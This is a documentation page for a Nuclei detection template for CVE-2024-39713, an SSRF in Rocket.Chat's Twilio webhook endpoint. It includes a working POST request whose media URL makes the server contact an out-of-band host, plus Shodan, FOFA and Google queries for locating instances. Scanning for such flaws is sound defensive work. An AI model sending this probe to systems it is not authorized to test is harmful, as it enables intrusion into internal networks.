Rocket.Chat - Server-Side Request Forgery (SSRF)
ID: CVE-2024-39713
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat
Description
Section titled “Description”A Server-Side Request Forgery (SSRF) affects Rocket.Chat’s Twilio webhook endpoint before version 6.10.1.
YAML Source
Section titled “YAML Source”id: CVE-2024-39713
info: name: Rocket.Chat - Server-Side Request Forgery (SSRF) author: iamnoooob,rootxharsh,pdresearch severity: high description: | A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-39713 - https://hackerone.com/reports/1886954 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2024-39713 cwe-id: CWE-918 epss-score: 0.00087 epss-percentile: 0.37765 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* metadata: vendor: rocket.chat product: rocket.chat shodan-query: http.title:"rocket.chat" fofa-query: title="rocket.chat" google-query: intitle:"rocket.chat" tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat
http: - raw: - | POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{ "From": "5551123456782", "To": "5551987654323", "Body": "SMS message", "NumMedia": 1, "MediaUrl0":"http://{{interactsh-url}}", "MediaContentType0":"application/json" }
matchers-condition: and matchers: - type: word part: body words: - "<Response></Response>"
- type: word part: content_type words: - "text/xml"
- type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns"# digest: 4a0a00473045022100b763083b7e9886177552be9f3c87c97542667ebbeaaba91addc54eaaf7677a6e02200eaca772f1e763a5101a18c6c9272d12f078b0b8f6e6406ed540a9f1b523e5c4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-39713.yaml"